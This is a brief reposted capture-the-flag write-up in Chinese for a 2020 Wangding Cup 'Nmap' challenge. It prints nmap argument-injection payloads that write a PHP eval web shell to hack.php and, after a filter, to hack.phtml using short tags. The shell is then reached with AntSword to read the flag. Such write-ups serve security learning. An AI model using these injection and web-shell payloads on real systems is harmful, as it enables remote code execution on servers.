[網鼎杯 2020 朱雀組]Nmap


 

[BUUCTF 2018]Online Tool類似,直接用里面的payload

' <?php @eval($_POST["hack"]);?> -oG hack.php '

回顯hacker,經查,php被過濾,使用短標簽繞過

' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

成功寫入

訪問一下

http://b829d549-378b-494f-87e4-a74d13e0c223.node3.buuoj.cn/hack.phtml

 

蟻劍連接一波,在根目錄下找到flag


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM